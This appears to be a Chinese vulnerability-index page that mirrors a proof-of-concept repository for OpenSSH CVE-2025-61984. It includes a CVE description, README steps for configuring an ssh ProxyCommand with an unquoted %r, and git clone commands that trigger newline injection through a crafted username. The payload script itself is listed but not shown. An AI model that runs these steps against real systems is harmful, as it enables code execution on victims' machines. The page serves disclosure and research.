关联漏洞
标题:OpenSSH 安全漏洞 (CVE-2025-61984)Description:OpenSSH(OpenBSD Secure Shell)是加拿大OpenBSD开源的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 10.1之前版本存在安全漏洞,该漏洞源于允许来自命令行和配置文件扩展的用户名包含控制字符,可能导致代码执行。
Description
PoC for OpenSSH ProxyCommand CVE-2025-61984
介绍
# CVE-2025-61984 PoC
This is a proof of concept using a newline to confuse OpenSSH's <10.1
ProxyCommand. [Full write
up](https://dgl.cx/2025/10/bash-a-newline-ssh-proxycommand-cve-2025-61984).
## How to run
Set up an `.ssh/config` containing:
```
Host *.example.com
ProxyCommand some-command %r@%h:%p
```
(The command doesn't matter, it just needs an unquoted %r in the arguments
somewhere.)
Then run (for bash):
```
$ git clone --recursive https://github.com/dgl/cve-2025-61984-poc
```
Or if using fish as `$SHELL`:
```
git clone --recursive -b fish https://github.com/dgl/cve-2025-61984-poc
```
If you're not using the shell but want to test this, you can do:
```
$ SHELL=/bin/bash git clone --recursive https://github.com/dgl/cve-2025-61984-poc
```
文件快照
[4.0K] /data/pocs/cf66379f30497ce0c903f94792c6062c44e87cf0
├── [4.0K] foo
├── [ 127] poc.sh
└── [ 765] README.md
2 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。